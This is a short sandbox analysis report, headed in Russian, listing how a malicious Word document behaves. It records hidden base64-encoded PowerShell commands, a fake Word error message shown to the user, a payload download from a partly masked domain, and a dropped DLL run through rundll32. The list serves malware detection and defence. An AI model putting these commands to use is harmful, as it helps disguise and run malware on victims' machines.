Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD UwBWACAAIAB0ADQAQgA3AGsAIAAoACAAWwBUAFkAUABFAF0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9AHsAMwB9ACIALQBmACcAbwAuAEQAaQAnACwAJwBzAFkAcwBUAEUATQAnACwAJwAuAGkAJwAsACcAUgBlAGMA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1588
- %TEMP%\1078934.cvr
- %HOMEPATH%\e1bad5e\rvmn7kd\fhdtme10.dll
- http://fe###tec.com/c2eivsswg.rar
- DNS ASK fe###tec.com
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD UwBWACAAIAB0ADQAQgA3AGsAIAAoACAAWwBUAFkAUABFAF0AKAAiAHsAMQB9AH...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\E1bad5e\Rvmn7kd\Fhdtme10.dll 0